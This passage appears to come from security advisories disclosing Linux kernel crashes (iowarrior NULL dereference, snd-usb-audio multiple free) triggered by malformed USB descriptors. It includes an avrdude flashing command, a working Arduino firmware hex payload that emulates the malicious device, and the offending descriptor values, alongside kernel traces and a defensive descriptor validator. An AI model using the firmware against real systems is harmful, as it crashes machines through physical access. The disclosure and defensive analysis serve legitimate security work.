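    for (size_t i = 0; i < 3; ++i) {
        int rc = iowarrior_report_size(cases[i]);
        if (rc < 0)
            printf("case %zu: probe rejected, rc=%d (unguarded driver would oops)\n", i + 1, rc);
        else
            printf("case %zu: report_size=%d\n", i + 1, rc);
    }
    return 0;
}
```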

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on November 12th, 2015.
To this day, no security patch has been provided by the vendor.
Since our 90-day Responsible Disclosure deadline has expired, we publish this 
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283390

Kernel Stacktrace:

[ 34.458988] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 34.662073] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint 
descriptors, different from the interface descriptor's value: 0
[ 34.694667] usb 1-1: New USB device found, idVendor=07c0, idProduct=1500
[ 34.701412] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 34.709475] usb 1-1: Product: Ä?
[ 34.713214] usb 1-1: Manufacturer: Ä?
[ 34.717062] usb 1-1: SerialNumber: %
[ 34.779320] BUG: unable to handle kernel NULL pointer dereference at 
0000000000000004
[ 34.780026] IP: [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] PGD 0 
[ 34.780026] Oops: 0000 [#1] SMP 
[ 34.780026] Modules linked in: iowarrior(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 34.780026] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 34.780026] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 34.780026] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 34.780026] RIP: 0010:[<ffffffffa03943d4>] [<ffffffffa03943d4>] 
iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP: 0018:ffff88000bd23b98 EFLAGS: 00010246
[ 34.780026] RAX: 0000000000000000 RBX: ffff88000bd36600 RCX: 0000000000000000
[ 34.780026] RDX: 0000000000000000 RSI: 0000000000001500 RDI: ffff88000bd36688
[ 34.780026] RBP: ffff88000bd23be0 R08: 0000000000016460 R09: ffff88000e401700
[ 34.780026] R10: ffffffffa03942d3 R11: ffffffff810020d8 R12: ffff88000c525800
[ 34.780026] R13: ffff88000bcd0090 R14: ffff88000bcd0000 R15: ffff88000f508bc8
[ 34.780026] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 34.780026] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 34.780026] CR2: 0000000000000004 CR3: 000000000c448000 CR4: 
00000000000006f0
[ 34.780026] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 34.780026] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 34.780026] Stack:
[ 34.780026] ffff88000c525830 ffff88000bd23be0 ffffffff813dfba2 ffff88000af01800
[ 34.780026] ffff88000bcd0090 ffff88000bcd0000 ffffffffa03960c8 ffff88000c525830
[ 34.780026] ffffffffa0395500 ffff88000bd23c28 ffffffff8141dc04 000000000bd23c00
[ 34.780026] Call Trace:
[ 34.780026] [<ffffffff813dfba2>] ? __pm_runtime_set_status+0x132/0x210
[ 34.780026] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 34.780026] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 34.780026] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 34.780026] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 34.780026] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 34.780026] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 34.780026] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 34.780026] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 34.780026] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 34.780026] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 34.780026] [<ffffffffa039901e>] iowarrior_driver_init+0x1e/0x1000 [iowarrior]
[ 34.780026] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 34.780026] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 34.780026] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 34.780026] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 34.780026] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 34.780026] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 34.780026] Code: 0c c8 0f b6 41 03 83 e0 03 3c 03 75 da 80 79 02 00 0f 88 
10 02 00 00 48 89 4b 40 41 0f b6 47 04 83 c2 01 39 d0 7f cc 48 8b 43 48 <0f> 
b7 40 04 89 83 c8 00 00 00 49 8b 44 24 08 80 78 02 00 0f 84 
[ 34.780026] RIP [<ffffffffa03943d4>] iowarrior_probe+0x134/0x4a0 [iowarrior]
[ 34.780026] RSP <ffff88000bd23b98>
[ 34.780026] CR2: 0000000000000004
[ 35.199537] ---[ end trace b239663354a1c556 ]---
[ 35.205081] Kernel panic - not syncing: Fatal exception
[ 35.206054] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040C007001500010102030109028D
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF
-- 
            
OS-S Security Advisory 2016-17
Linux snd-usb-audio Multiple Free

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS - RHEL 7.1 Kernel crashes (multiple
free) on invalid USB device descriptors (snd-usb-audio driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November 12th, 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-17_snd-usb-audio.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the snd-usb-audio driver.

Detailed product description:
We confirmed the bug on the following systems:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Kernel 3.10.0-327.10.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x582
idProduct: 0x0
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1

This is the configuration descriptor containing the malicious value for
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
system (multiple free).

[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
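
A defender-side consistency check for the configuration descriptor above, written as an added example for this advisory (it is not the advisory's own code and not the snd-usb-audio driver's parsing logic). The descriptor bytes are reconstructed from the values listed above; the second variant sets bNumEndpoints to zero, as the text describes, while leaving the three endpoint descriptors in place, and the third hands the walker fewer bytes than wTotalLength promises.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Descriptor type codes from the USB 2.0 specification, chapter 9. */
#define USB_DT_CONFIG    0x02
#define USB_DT_INTERFACE 0x04
#define USB_DT_ENDPOINT  0x05

enum desc_check {
    DESC_OK = 0,
    DESC_TOO_SHORT,         /* buffer smaller than a configuration header */
    DESC_BAD_TYPE,          /* first descriptor is not a configuration descriptor */
    DESC_TRUNCATED,         /* wTotalLength or a bLength runs past the bytes we have */
    DESC_ENDPOINT_MISMATCH, /* bNumEndpoints disagrees with the endpoints that follow */
};

/*
 * Configuration descriptor reconstructed from the advisory's listing
 * (constructed sample data, not bytes lifted from the firmware image):
 * 9-byte configuration header, 9-byte interface descriptor with
 * bNumEndpoints = 3, then three 7-byte endpoint descriptors = 0x27 bytes.
 */
static const uint8_t advisory_config[] = {
    /* bLength, bDescriptorType, wTotalLength (LE), bNumInterfaces,
       bConfigurationValue, iConfiguration, bmAttributes, bMaxPower */
    0x09, 0x02, 0x27, 0x00, 0x01, 0x01, 0x00, 0x00, 0x31,
    /* interface 0, alt 0, bNumEndpoints = 3, class/subclass/protocol = 0 */
    0x09, 0x04, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00,
    /* endpoints: address, bmAttributes, wMaxPacketSize (LE), bInterval */
    0x07, 0x05, 0x81, 0x03, 0x04, 0x04, 0x0c,
    0x07, 0x05, 0x01, 0x02, 0x04, 0x00, 0x0c,
    0x07, 0x05, 0x82, 0x01, 0x04, 0x00, 0x0c,
};

/*
 * Walk a configuration descriptor and cross-check every interface's
 * bNumEndpoints against the endpoint descriptors that actually follow it.
 * Every length field is bounds-checked before it is used. On
 * DESC_ENDPOINT_MISMATCH, *claimed and *found describe the offending interface.
 */
enum desc_check validate_config_descriptor(const uint8_t *buf, size_t len,
                                           unsigned *claimed, unsigned *found)
{
    size_t off, total;
    int in_iface = 0;
    unsigned want = 0, have = 0;

    if (len < 9)
        return DESC_TOO_SHORT;
    if (buf[0] < 9 || buf[1] != USB_DT_CONFIG)
        return DESC_BAD_TYPE;
    total = (size_t)buf[2] | ((size_t)buf[3] << 8);
    if (total > len || total < buf[0])
        return DESC_TRUNCATED;

    for (off = buf[0]; off < total; off += buf[off]) {
        uint8_t blen = buf[off];
        /* every descriptor carries at least bLength and bDescriptorType */
        if (blen < 2 || off + blen > total)
            return DESC_TRUNCATED;
        if (buf[off + 1] == USB_DT_INTERFACE && blen >= 9) {
            if (in_iface && want != have)
                goto mismatch;        /* previous interface lied */
            in_iface = 1;
            want = buf[off + 4];      /* bNumEndpoints */
            have = 0;
        } else if (buf[off + 1] == USB_DT_ENDPOINT) {
            have++;
        }
        /* other descriptor types (class-specific and so on) are skipped */
    }
    if (in_iface && want != have)
        goto mismatch;
    return DESC_OK;

mismatch:
    if (claimed) *claimed = want;
    if (found)   *found = have;
    return DESC_ENDPOINT_MISMATCH;
}

/* The descriptor as published: bNumEndpoints = 3 and three endpoints follow. */
enum desc_check check_advisory_descriptor(unsigned *claimed, unsigned *found)
{
    return validate_config_descriptor(advisory_config, sizeof advisory_config,
                                      claimed, found);
}

/* Variant the advisory text describes: bNumEndpoints forced to 0 while the
   three endpoint descriptors are still present (constructed here). */
enum desc_check check_zero_endpoints_variant(unsigned *claimed, unsigned *found)
{
    uint8_t copy[sizeof advisory_config];
    memcpy(copy, advisory_config, sizeof copy);
    copy[9 + 4] = 0;  /* bNumEndpoints field of the interface descriptor */
    return validate_config_descriptor(copy, sizeof copy, claimed, found);
}

/* Host only received 30 of the 0x27 bytes that wTotalLength promises. */
enum desc_check check_truncated_variant(void)
{
    return validate_config_descriptor(advisory_config, 30, NULL, NULL);
}

int main(void)
{
    unsigned c = 0, f = 0;
    printf("published descriptor: %d\n", check_advisory_descriptor(&c, &f));
    printf("bNumEndpoints=0 variant: %d (claimed %u, found %u)\n",
           check_zero_endpoints_variant(&c, &f), c, f);
    printf("truncated buffer: %d\n", check_truncated_variant());
    return 0;
}
```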

A Kernel Address Sanitizer (KASan) report is available at https://os-s.net/advisories/OSS-2016-17_KASan_Report.txt.

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on November 12th, 2015.
To this day, no security patch has been provided by the vendor.
Since our 90-day Responsible Disclosure deadline has expired, we are publishing
this Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283358

Kernel Stacktrace:

[ 32.951497] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 33.172627] usb 1-1: New USB device found, idVendor=0582, idProduct=0000
[ 33.179073] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 33.186972] usb 1-1: Product: Ä?
[ 33.190732] usb 1-1: Manufacturer: Ä?
[ 33.195718] usb 1-1: SerialNumber: %
[ 33.206296] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 33.344127] BUG: unable to handle kernel NULL pointer dereference at
(null)
[ 33.345023] IP: [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] PGD 0
[ 33.345023] Oops: 0000 [#1] SMP
[ 33.345023] Modules linked in: snd_usb_audio(+) snd_usbmidi_lib snd_hwdep
snd_rawmidi snd_seq snd_seq_device snd_pcm snd_timer snd soundcore
ip6t_rpfilter ip6t_REJECT ipt_REJECT xt_conntrack ebtable_nat ebtable_broute
bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6
nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw
ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4
nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw
iptable_filter ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm
drm_kms_helper drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs
libcrc32c sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic
pata_acpi ata_piix libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 33.345023] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 33.345023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 33.345023] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 33.345023] RIP: 0010:[<ffffffffa041d063>] [<ffffffffa041d063>]
free_substream.part.0+0x53/0x70 [snd_usb_audio]
[ 33.345023] RSP: 0018:ffff88000bd239b8 EFLAGS: 00010217
[ 33.345023] RAX: ffff88000c53c101 RBX: ffff88000c53c080 RCX: 00000000000067bd
[ 33.345023] RDX: 00000000000067bc RSI: ffffea00002f5400 RDI: ffff88000e401900
[ 33.345023] RBP: ffff88000bd239d8 R08: 0000000000016420 R09: ffff88000fc16420
[ 33.345023] R10: ffffea0000314f00 R11: ffffffffa041d060 R12: 0000000000000000
[ 33.345023] R13: ffff8800000588b8 R14: ffff880000058818 R15: 0000000000000000
[ 33.345023] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 33.345023] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 33.345023] CR2: 0000000000000000 CR3: 000000000bd05000 CR4:
00000000000006f0
[ 33.345023] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 33.345023] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 33.345023] Stack:
[ 33.345023] ffff880000058800 ffff880000058600 0000000000000000 ffff88000c388a68
[ 33.345023] ffff88000bd239f0 ffffffffa041d319 ffffffffa03da0b8 ffff88000bd23a10
[ 33.345023] ffffffffa03c88b8 ffff88000f5c2a80 ffff88000c388980 ffff88000bd23a20
[ 33.345023] Call Trace:
[ 33.345023] [<ffffffffa041d319>] snd_usb_audio_pcm_free+0x69/0x70
[snd_usb_audio]
[ 33.345023] [<ffffffffa03c88b8>] snd_pcm_free+0x58/0x90 [snd_pcm]
[ 33.345023] [<ffffffffa03c8902>] snd_pcm_dev_free+0x12/0x20 [snd_pcm]
[ 33.345023] [<ffffffffa03a2ec9>] __snd_device_free+0x29/0x80 [snd]
[ 33.345023] [<ffffffffa03a319b>] snd_device_free_all+0x3b/0x50 [snd]
[ 33.345023] [<ffffffffa039c8ae>] release_card_device+0x1e/0x80 [snd]
[ 33.345023] [<ffffffff813cdde2>] device_release+0x32/0xa0
[ 33.345023] [<ffffffff812d6efe>] kobject_release+0x7e/0x1b0
[ 33.345023] [<ffffffff812d6db8>] kobject_put+0x28/0x60
[ 33.345023] [<ffffffff813ce107>] put_device+0x17/0x20
[ 33.345023] [<ffffffffa039cb09>] snd_card_free_when_closed+0x29/0x40 [snd]
[ 33.345023] [<ffffffffa039cc64>] snd_card_free+0x54/0x90 [snd]
[ 33.345023] [<ffffffffa041bf83>] ? create_composite_quirk+0x73/0xb0
[snd_usb_audio]
[ 33.345023] [<ffffffffa040e991>] usb_audio_probe+0x251/0x8d0 [snd_usb_audio]
[ 33.345023] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 33.345023] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 33.345023] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 33.345023] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 33.345023] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 33.345023] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 33.345023] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 33.345023] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 33.345023] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 33.345023] [<ffffffffa0437000>] ? 0xffffffffa0436fff
[ 33.345023] [<ffffffffa043701e>] usb_audio_driver_init+0x1e/0x1000
[snd_usb_audio]
[ 33.345023] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
